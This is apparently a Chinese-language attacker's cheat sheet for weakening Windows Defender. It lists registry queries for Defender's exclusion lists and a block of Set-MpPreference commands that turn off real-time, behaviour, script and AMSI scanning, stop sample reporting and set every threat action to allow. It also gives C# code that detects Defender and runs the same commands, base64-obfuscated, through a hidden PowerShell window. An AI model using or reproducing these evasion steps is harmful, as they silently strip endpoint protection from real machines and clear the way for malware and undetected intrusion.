通过修改Defender
扫描行为、扫描强度等设置来尽量降低Defender
防护强度
Defender白名单注册表键值
在新一些的版本中有Tamper Protection所以就不行了
直接向白名单路径下添加值即可
- 目录及文件:
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths"
- 后缀:
reg query HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions
- 进程:
reg query HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes
降低Defender防护能力
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
| powershell Set-MpPreference -DisableRealtimeMonitoring $true //禁用实时监控,执行了会在右下角有提示,不使用 powershell Set-MpPreference -DisableArchiveScanning $true //禁用存档扫描 powershell Set-MpPreference -DisableBehaviorMonitoring $true //禁用行为监控 powershell Set-MpPreference -DisableBlockAtFirstSeen $true powershell Set-MpPreference -DisableIOAVProtection $true //禁用IOAV保护,禁用AMSI powershell Set-MpPreference -DisablePrivacyMode $true //禁用隐私模式 powershell Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true //没有引擎启动时签名禁用更新 powershell Set-MpPreference -DisableIntrusionPreventionSystem $true powershell Set-MpPreference -DisableScriptScanning $true //禁用脚本扫描 powershell Set-MpPreference -SubmitSamplesConsent 2 powershell Set-MpPreference -MAPSReporting 0 powershell Set-MpPreference -HighThreatDefaultAction 6 -Force powershell Set-MpPreference -ModerateThreatDefaultAction 6 powershell Set-MpPreference -LowThreatDefaultAction 6 powershell Set-MpPreference -SevereThreatDefaultAction 6 //严重威胁默认操作
|
检测是否是Defender
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25
| using Microsoft.Win32;
public static bool isDefender() { string regPath = @"SOFTWARE\Microsoft\Windows Defender"; try { using (RegistryKey key = Registry.LocalMachine.OpenSubKey(regPath, RegistryKeyPermissionCheck.Default)) { if (key.GetValue("DisableAntiSpyware").ToString() == "1" | key.GetValue("DisableAntiVirus").ToString() == "1") { return false; } else { return true; } } } catch (Exception) { return true; } }
|
关闭Defender防护
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22
| public static void KillWindowsDefender() { string pj = @"UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBBAHIAYwBoAGkAdgBlAFMAYwBhAG4AbgBpAG4AZwAgACQAdAByAHUAZQAsAFMAZQB0AC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEQAaQBzAGEAYgBsAGUAQgBlAGgAYQB2AGkAbwByAE0AbwBuAGkAdABvAHIAaQBuAGcAIAAkAHQAcgB1AGUALABTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBEAGkAcwBhAGIAbABlAEIAbABvAGMAawBBAHQARgBpAHIAcwB0AFMAZQBlAG4AIAAkAHQAcgB1AGUALABTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBEAGkAcwBhAGIAbABlAEkATwBBAFYAUAByAG8AdABlAGMAdABpAG8AbgAgACQAdAByAHUAZQAsAFMAZQB0AC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEQAaQBzAGEAYgBsAGUAUAByAGkAdgBhAGMAeQBNAG8AZABlACAAJAB0AHIAdQBlACwAUwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AUwBpAGcAbgBhAHQAdQByAGUARABpAHMAYQBiAGwAZQBVAHAAZABhAHQAZQBPAG4AUwB0AGEAcgB0AHUAcABXAGkAdABoAG8AdQB0AEUAbgBnAGkAbgBlACAAJAB0AHIAdQBlACwAUwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBJAG4AdAByAHUAcwBpAG8AbgBQAHIAZQB2AGUAbgB0AGkAbwBuAFMAeQBzAHQAZQBtACAAJAB0AHIAdQBlACwAUwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBTAGMAcgBpAHAAdABTAGMAYQBuAG4AaQBuAGcAIAAkAHQAcgB1AGUALABTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBTAHUAYgBtAGkAdABTAGEAbQBwAGwAZQBzAEMAbwBuAHMAZQBuAHQAIAAyACwAUwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ATQBBAFAAUwBSAGUAcABvAHIAdABpAG4AZwAgADAALABTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBIAGkAZwBoAFQAaAByAGUAYQB0AEQAZQBmAGEAdQBsAHQAQQBjAHQAaQBvAG4AIAA2ACAALQBGAG8AcgBjAGUALABTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBNAG8AZABlAHIAYQB0AGUAVABoAHIAZQBhAHQARABlAGYAYQB1AGwAdABBAGMAdABpAG8AbgAgADYALABTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBMAG8AdwBUAGgAcgBlAGEAdABEAGUAZgBhAHUAbAB0AEEAYwB0AGkAbwBuACAANgAsAFMAZQB0AC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAFMAZQB2AGUAcgBlAFQAaAByAGUAYQB0AEQAZQBmAGEAdQBsAHQAQQBjAHQAaQBvAG4AIAA2AA=="; pj = Encoding.Unicode.GetString(Convert.FromBase64String(pj));
Process p = new Process(); p.StartInfo.FileName = @"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"; p.StartInfo.UseShellExecute = false; p.StartInfo.CreateNoWindow = true; p.StartInfo.RedirectStandardOutput = true; p.StartInfo.RedirectStandardError = true; p.StartInfo.RedirectStandardInput = true; p.Start(); foreach (var i in pj.Split(',')) { Console.WriteLine(i); p.StandardInput.WriteLine(i); } p.StandardInput.WriteLine("exit"); p.Dispose(); }
|